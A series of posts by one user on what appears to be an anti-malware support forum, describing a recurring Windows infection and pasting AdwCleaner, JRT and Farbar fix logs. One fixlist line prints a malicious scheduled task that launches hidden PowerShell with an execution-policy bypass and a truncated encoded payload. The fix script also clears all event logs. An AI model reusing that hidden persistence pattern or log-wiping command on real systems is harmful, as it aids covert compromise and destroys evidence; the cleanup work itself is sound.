Irvineboy

Members
Posts: 19
Reputation: 0 Neutral

  1. Maybe on the free trial version, even when you click on "scan for rootkit", it does not work?
  2. Is the Malwarebytes Anti-Rootkit something we can scan with regularly like the Anti-Malware program? In the Anti-Malware program, there is an option to turn on "scan for rootkit". So shouldn't that take care of it during the scans?
  3. So why doesn't Malwarebytes combine the 3 products into one?
  4. Here are the results of the Fixlog.txt from FRST64. Fixlog.txt
  5. Here is the ESET log: ESET log.txt. What is interesting is that ESET actually found 23, not 13, infected files that Malwarebytes Anti-Malware + AdwCleaner + JRT, 3 programs, did not find.
  6. Ron, here are the results of the FRST64 scan. The FRST.txt file does not show anything, but the Addition.txt does. Also the Malwarebytes threat scan log. FRST.txt Addition.txt MB.txt
  7. Ron, I'm not having issues running Malwarebytes. I have run it with the latest version from your link above. Someone told me to rescan with something called the ESET Online Scanner website. It's catching 13 infected files that Malwarebytes Anti-Malware, AdwCleaner and JRT did not catch.
  8. OK, I finally got Malwarebytes Anti-Malware to work in Safe Mode. I just reran Malwarebytes Anti-Malware. It found 936 threats and I quarantined all 936 threats. I also scanned with AdwCleaner by Malwarebytes and removed 29 threats. I will post the log below. I also ran JRT, but the system restore failed. I will post the log below. I did this a few days ago and the virus was supposedly gone. But then the computer restarted out of nowhere by itself and went to a blue screen, and everything bad occurred again. It almost seems like the trojan went dormant while the scans were being done, it showed virus free, then came back.

     AdwCleaner log is here:

     # AdwCleaner v6.045 - Logfile created 30/03/2017 at 06:59:24
     # Updated on 28/03/2017 by Malwarebytes
     # Database : 2017-03-28.2 [Local]
     # Operating System : Windows 7 Home Premium Service Pack 1 (X64)
     # Username : Jason - JASON-PC
     # Running from : C:\Users\Jason\Desktop\Malewarbytes\adwcleaner_6.045.exe
     # Mode: Clean
     # Support : https://www.malwarebytes.com/support

     ***** [ Services ] *****

     ***** [ Folders ] *****

     [-] Folder deleted: C:\Users\Public\Documents\Guid
     [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Itibiti
     [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tlerauic
     [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiThemes
     [-] Folder deleted: C:\Windows\SysWOW64\sstmp

     ***** [ Files ] *****

     [-] File deleted: C:\TOSTACK
     [-] File deleted: C:\Windows\SysWOW64\delay.dat

     ***** [ DLL ] *****

     ***** [ WMI ] *****

     ***** [ Shortcuts ] *****

     ***** [ Scheduled Tasks ] *****

     [-] Task deleted: Lmeried

     ***** [ Registry ] *****

     [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}
     [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}
     [-] Key deleted: HKU\.DEFAULT\Software\AppDataLow\Software\WikiThemes
     [#] Key deleted on reboot: HKU\S-1-5-18\Software\AppDataLow\Software\WikiThemes
     [-] Key deleted: HKLM\SOFTWARE\SearchModule
     [-] Key deleted: HKLM\SOFTWARE\msServer
     [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
     [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}
     [-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule
     [-] Key deleted: [x64] HKLM\SOFTWARE\HDWallpaper
     [-] Key deleted: [x64] HKLM\SOFTWARE\DtsEncodeTools
     [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
     [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
     [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
     [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\22dab7df1273e6748e51e8e147fdb2dc
     [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
     [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\22dab7df1273e6748e51e8e147fdb2dc
     [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
     [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
     [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
     [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}

     ***** [ Web browsers ] *****

     *************************

     :: "Tracing" keys deleted
     :: Winsock settings cleared

     *************************

     C:\AdwCleaner\AdwCleaner[C0].txt - [13986 Bytes] - [28/03/2017 14:08:30]
     C:\AdwCleaner\AdwCleaner[C2].txt - [3290 Bytes] - [30/03/2017 06:59:24]
     C:\AdwCleaner\AdwCleaner[S0].txt - [14882 Bytes] - [27/03/2017 13:10:07]
     C:\AdwCleaner\AdwCleaner[S1].txt - [12735 Bytes] - [28/03/2017 13:18:40]
     C:\AdwCleaner\AdwCleaner[S2].txt - [12622 Bytes] - [28/03/2017 14:00:05]
     C:\AdwCleaner\AdwCleaner[S3].txt - [1458 Bytes] - [28/03/2017 17:50:43]
     C:\AdwCleaner\AdwCleaner[S4].txt - [3698 Bytes] - [30/03/2017 06:59:10]

     ########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [3731 Bytes] ##########

     JRT log here:

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Junkware Removal Tool (JRT) by Malwarebytes
     Version: 8.1.2 (03.10.2017)
     Operating System: Windows 7 Home Premium x64
     Ran by Jason (Administrator) on Thu 03/30/2017 at 7:16:51.30
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     File System: 9

     Successfully deleted: C:\Windows\wininit.ini (File)
     Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3U4MKWUY (Temporary Internet Files Folder)
     Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I82QPFC5 (Temporary Internet Files Folder)
     Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RWUNYEY3 (Temporary Internet Files Folder)
     Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W4H4K7UF (Temporary Internet Files Folder)
     Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3U4MKWUY (Temporary Internet Files Folder)
     Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I82QPFC5 (Temporary Internet Files Folder)
     Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RWUNYEY3 (Temporary Internet Files Folder)
     Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W4H4K7UF (Temporary Internet Files Folder)

     Registry: 0

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Scan was completed on Thu 03/30/2017 at 7:17:48.33
     End of JRT log
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9. One more to add - the above happened AFTER I ran the Malwarebytes Anti-Rootkit Supplement. Even after I restarted the computer, I went back to the MBAR folder, clicked on the Plugins folder, and then on FixDamage.exe.
  10. That link has the exact version I had originally installed. Problem is, the virus won't let me open Malwarebytes AntiVirus, even in Safe Mode. When I click on it, it says "The requested resource is in use".
  11. I thought I had version 3.0.6, which I originally had installed and scanned with to get rid of the virus before it got reinfected, because it said my version was the latest update. I worry it goes dormant so it looks like the scan worked, and then comes back.
  12. Here are the results of the fixlog. I still have a few applications that I don't recognize showing up on my desktop and my start menu: Launch System Healer and Launch One System Care. They don't show up in "uninstall program" for some reason. When I open a browser, I get www-searching.com, which is a virus.

     Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
     Ran by Jason (29-03-2017 21:14:42) Run:3
     Running from C:\Users\Jason\Desktop
     Loaded Profiles: Jason (Available Profiles: Jason)
     Boot Mode: Safe Mode (with Networking)
     ==============================================

     fixlist content:
     *****************
     Task: {033D8299-43DA-4642-A0E5-772C2F1E18BF} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
     Task: {3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
     Task: {59D662DB-18C6-48A4-AB18-363E41960B8B} - System32\Tasks\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgACAAOwAgACAAOwA7ADsAIAAgADsAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIA (the data entry has 9964 more characters). <==== ATTENTION
     Task: {CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION
     Task: {D259DB4A-5842-489A-B975-8790C69A5ED3} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
     Task: {FB2DA1EB-6B73-4959-88B0-E758093EFFAA} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
     Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
     Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
     Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
     HKLM-x32\...\Run: [AnonymizerGadget] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe [349704 2017-03-29] (Jetico ltd) <===== ATTENTION
     HKLM-x32\...\Run: [AppTrailers] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe [47835928 2017-03-10] () <===== ATTENTION
     HKLM-x32\...\Run: [WikiThemes] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe [47852648 2017-03-10] () <===== ATTENTION
     HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Windows\TEMP\IXP000.TMP\" <===== ATTENTION
     HKU\S-1-5-18\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe [7342080 2013-06-26] () <===== ATTENTION
     S2 5c94f427ca6a541e75713ba5123bd6b4; C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4\f107708187d152b4ed103032f0a278ba.exe [14661120 2017-03-24] () [File not signed] <==== ATTENTION
     S2 Dataup; C:\Program Files (x86)\ntuserlitelist\dataup\dataup.exe [77824 2017-01-05] () [File not signed] <==== ATTENTION
     S2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [2989056 2017-03-29] (Search Module Ltd.) [File not signed] <==== ATTENTION
     S2 TheScreenshotProService; C:\Program Files (x86)\ScreenshotPro\1.0.0.6000090\ScreenshotProServ.exe [152688 2017-01-11] () <==== ATTENTION
     S2 windowsmanagementservice; C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw\ct.exe [947200 2017-03-29] () [File not signed] <==== ATTENTION
     R0 drmkpro64; C:\Windows\System32\drivers\ndistpr64.sys [78112 2013-09-28] () [File not signed] <==== ATTENTION
     HKU\S-1-5-18\...\Run: [Spoutly.exe] => C:\Program Files (x86)\Spoutly\SpoutlyLauncher.exe
     HKU\S-1-5-18\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe [7342080 2013-06-26] () <===== ATTENTION
     HKU\S-1-5-18\...\Run: [1L2OBBN7P3] => C:\Program Files\XH54S4PPV7\IQMRG187L.exe [1065984 2017-03-29] (00P5M6RS)
     HKU\S-1-5-18\...\Run: [IT3HV1YGYE] => C:\Program Files\PCX8PI5E2E\PCX8PI5E2.exe [1065984 2017-03-29] (00P5M6RS)
     HKU\S-1-5-18\...\Run: [9y7HKMIExV.exe] => C:\Program Files\XH54S4PPV7\Q8VWXWTQ2D1BYWBKH079J8G3DHFZZMSZ9ABQV2L2W\9y7HKMIExV.exe [168448 2017-03-29] (tachba3)
     HKU\S-1-5-18\...\Run: [VQVQ7492KB] => C:\Program Files\5VU8BUUF37\9GKARZYLQ.exe [1065984 2017-03-29] (00P5M6RS)
     R1 ebcb96f81037be9a3e0ca90a17dbc11c; C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys [8501584 2017-03-24] (MPDV6U) <==== ATTENTION
     R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-03-29] () <==== ATTENTION
     FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
     FF Plugin HKU\S-1-5-21-616515737-2173210804-205294457-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Jason\AppData\Roaming\ACEStream\player\npace_plugin.dll [No File]
     C:\Users\Jason\AppData\Roaming\ACEStream
     C:\Windows\system32\drivers\NetUtils2016.sys
     C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw
     C:\Program Files (x86)\ntuserlitelist\dataup
     C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys
     C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4
     C:\Program Files (x86)\Itibiti Soft Phone
     C:\Program Files (x86)\ScreenshotPro
     C:\Program Files\Common Files\Noobzo
     C:\Program Files (x86)\OneSystemCare
     C:\Program Files (x86)\Spoutly
     C:\Program Files\XH54S4PPV7
     C:\Windows\TEMP\IXP000.TMP
     C:\Program Files (x86)\SystemHealer
     C:\Program Files\5VU8BUUF37
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe
     2017-03-28 13:13 - 2017-03-28 17:37 - 0000380 _____ () C:\Users\Jason\AppData\Roaming\sp_data.sys
     2017-03-28 13:13 - 2017-03-29 08:46 - 0000440 _____ () C:\ProgramData\lxebscan.log
     2017-03-28 13:15 - 2017-03-28 13:15 - 0000159 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
     2017-03-29 08:31 - 2017-03-29 08:31 - 0327680 _____ () C:\ProgramData\smp2.exe
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe
     C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe
     C:\ProgramData\smp2.exe
     S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2016-03-09] ()
     C:\Windows\system32\drivers\semav6msr64.sys
     S2 zigipyro; C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88\qnsuCB40.tmp [158720 2015-12-26] () [File not signed]
     S2 gemeloki; C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195\protf6ed071c-ac2e-489b-914e-97afa5bc5edd.tmpfs [X]
     S2 servervo; C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195\knsf6ed071c-ac2e-489b-914e-97afa5bc5edd.tmpfs [X]
     C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195
     C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88
     CMD: bcdedit.exe /set {bootmgr} displaybootmenu Yes
     CMD: bcdedit.exe /set {current} bootstatuspolicy DisplayAllFailures
     CMD: bcdedit.exe /set {current} recoveryenabled Yes
     CMD: netsh advfirewall reset
     CMD: netsh advfirewall set allprofiles state ON
     CMD: ipconfig /flushdns
     CMD: netsh winsock reset catalog
     CMD: netsh int ip reset C:\resettcpip.txt
     CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
     CMD: Bitsadmin /Reset /Allusers
     EMPTYTEMP:
     Reboot:
     *****************

     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{033D8299-43DA-4642-A0E5-772C2F1E18BF} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{033D8299-43DA-4642-A0E5-772C2F1E18BF} => key removed successfully
     C:\Windows\System32\Tasks\One System CarePeriod => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System CarePeriod => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} => key removed successfully
     C:\Windows\System32\Tasks\One System Care Task => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{59D662DB-18C6-48A4-AB18-363E41960B8B} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{59D662DB-18C6-48A4-AB18-363E41960B8B} => key removed successfully
     C:\Windows\System32\Tasks\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} => key removed successfully
     C:\Windows\System32\Tasks\System Healer Task => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D259DB4A-5842-489A-B975-8790C69A5ED3} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D259DB4A-5842-489A-B975-8790C69A5ED3} => key removed successfully
     C:\Windows\System32\Tasks\System HealerPeriod => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerPeriod => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB2DA1EB-6B73-4959-88B0-E758093EFFAA} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB2DA1EB-6B73-4959-88B0-E758093EFFAA} => key removed successfully
     C:\Windows\System32\Tasks\System HealerStartUp => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerStartUp => key removed successfully
     C:\Windows\Tasks\One System CarePeriod.job => moved successfully
     C:\Windows\Tasks\System HealerPeriod.job => moved successfully
     C:\Windows\Tasks\System HealerStartUp.job => moved successfully
     HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AnonymizerGadget => value removed successfully
     HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AppTrailers => value not found.
     HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\WikiThemes => value not found.
     HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0 => value not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Itibiti.exe => value removed successfully
     HKLM\System\CurrentControlSet\Services\5c94f427ca6a541e75713ba5123bd6b4 => key removed successfully
     5c94f427ca6a541e75713ba5123bd6b4 => service removed successfully
     Dataup => service not found.
     HKLM\System\CurrentControlSet\Services\SMUpd => key removed successfully
     SMUpd => service removed successfully
     HKLM\System\CurrentControlSet\Services\TheScreenshotProService => key removed successfully
     TheScreenshotProService => service removed successfully
     HKLM\System\CurrentControlSet\Services\windowsmanagementservice => key removed successfully
     windowsmanagementservice => service removed successfully
     drmkpro64 => service not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Spoutly.exe => value removed successfully
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Itibiti.exe => value not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\1L2OBBN7P3 => value not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\IT3HV1YGYE => value not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\9y7HKMIExV.exe => value not found.
     HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\VQVQ7492KB => value not found.
     HKLM\System\CurrentControlSet\Services\ebcb96f81037be9a3e0ca90a17dbc11c => key removed successfully
     ebcb96f81037be9a3e0ca90a17dbc11c => service removed successfully
     HKLM\System\CurrentControlSet\Services\NetUtils2016 => key removed successfully
     NetUtils2016 => service removed successfully
     HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
     HKU\S-1-5-21-616515737-2173210804-205294457-1001\Software\MozillaPlugins\@acestream.net/acestreamplugin,version=3.1.6 => key removed successfully
     C:\Users\Jason\AppData\Roaming\ACEStream\player\npace_plugin.dll => not found.
     "C:\Users\Jason\AppData\Roaming\ACEStream" => not found.
     "C:\Windows\system32\drivers\NetUtils2016.sys" => not found.
     C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw => moved successfully
     C:\Program Files (x86)\ntuserlitelist\dataup => moved successfully
     "C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys" => not found.
     C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4 => moved successfully
     "C:\Program Files (x86)\Itibiti Soft Phone" => not found.
     C:\Program Files (x86)\ScreenshotPro => moved successfully
     C:\Program Files\Common Files\Noobzo => moved successfully
     "C:\Program Files (x86)\OneSystemCare" => not found.
     "C:\Program Files (x86)\Spoutly" => not found.
     C:\Program Files\XH54S4PPV7 => moved successfully
     "C:\Windows\TEMP\IXP000.TMP" => not found.
     "C:\Program Files (x86)\SystemHealer" => not found.
     C:\Program Files\5VU8BUUF37 => moved successfully
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes" => not found.
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers" => not found.
     C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe => moved successfully
     C:\Users\Jason\AppData\Roaming\sp_data.sys => moved successfully
     C:\ProgramData\lxebscan.log => moved successfully
     C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc => moved successfully
     C:\ProgramData\smp2.exe => moved successfully
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe" => not found.
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe" => not found.
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe" => not found.
     "C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe" => not found.
     "C:\ProgramData\smp2.exe" => not found.
     HKLM\System\CurrentControlSet\Services\semav6msr64 => key removed successfully
     semav6msr64 => service removed successfully
     C:\Windows\system32\drivers\semav6msr64.sys => moved successfully
     zigipyro => service not found.
     gemeloki => service not found.
     servervo => service not found.
     C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195 => moved successfully
     "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88" => not found.

     ========= bcdedit.exe /set {bootmgr} displaybootmenu Yes =========

     The operation completed successfully.

     ========= End of CMD: =========

     ========= bcdedit.exe /set {current} bootstatuspolicy DisplayAllFailures =========

     The operation completed successfully.

     ========= End of CMD: =========

     ========= bcdedit.exe /set {current} recoveryenabled Yes =========

     The operation completed successfully.

     ========= End of CMD: =========

     ========= netsh advfirewall reset =========

     Ok.

     ========= End of CMD: =========

     ========= netsh advfirewall set allprofiles state ON =========

     Ok.

     ========= End of CMD: =========

     ========= ipconfig /flushdns =========

     Windows IP Configuration

     Successfully flushed the DNS Resolver Cache.

     ========= End of CMD: =========

     ========= netsh winsock reset catalog =========

     Sucessfully reset the Winsock Catalog.
     You must restart the computer in order to complete the reset.

     ========= End of CMD: =========

     ========= netsh int ip reset C:\resettcpip.txt =========

     Reseting Global, OK!
     Reseting Interface, OK!
     Restart the computer to complete this action.

     ========= End of CMD: =========

     ========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========

     Failed to clear log AirSpaceChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.

     ========= End of CMD: =========

     ========= Bitsadmin /Reset /Allusers =========

     BITSADMIN version 3.0 [ 7.5.7601 ]
     BITS administration utility.
     (C) Copyright 2000-2006 Microsoft Corp.

     BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
     Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

     Unable to connect to BITS - 0x8007042c
     The dependency service or group failed to start.

     ========= End of CMD: =========

     =========== EmptyTemp: ==========

     BITS transfer queue => 4194304 B
     DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13649096 B
     Java, Flash, Steam htmlcache => 0 B
     Windows/system/drivers => 170598154 B
     Edge => 0 B
     Chrome => 28337511 B
     Firefox => 0 B
     Opera => 0 B

     Temp, IE cache, history, cookies, recent:
     Users => 0 B
     Default => 0 B
     Public => 0 B
     ProgramData => 0 B
     systemprofile => 128 B
     systemprofile32 => 103299153 B
     LocalService => 0 B
     NetworkService => 5010 B
     Jason => 11052526 B

     RecycleBin => 6324502 B
     EmptyTemp: => 321.8 MB temporary data Removed.

     ================================

     The system needed a reboot.

     ==== End of Fixlog 21:16:13 ====
  13. I thought all three tools removed the virus. However, the virus came back, so I posted the scan results and now I am not sure what to do. It seems like the virus goes dormant and then reappears. Frustrating.
  14. Two attachments here. FRST.txt Addition.txt
  15. I ended up using the Malwarebytes Anti-Rootkit and that got rid of the virus; after scanning a few times, the virus was gone. But today, the virus came back! My computer automatically restarted and upon loading the desktop, there were a bunch of unwanted applications like Launch System Healer, Video Abductor and KNCTR. Then it started blue-screening again and won't let me load Windows in Normal Mode. Again, it won't let me launch Malwarebytes either: "The requested resource is in use". Stubborn virus.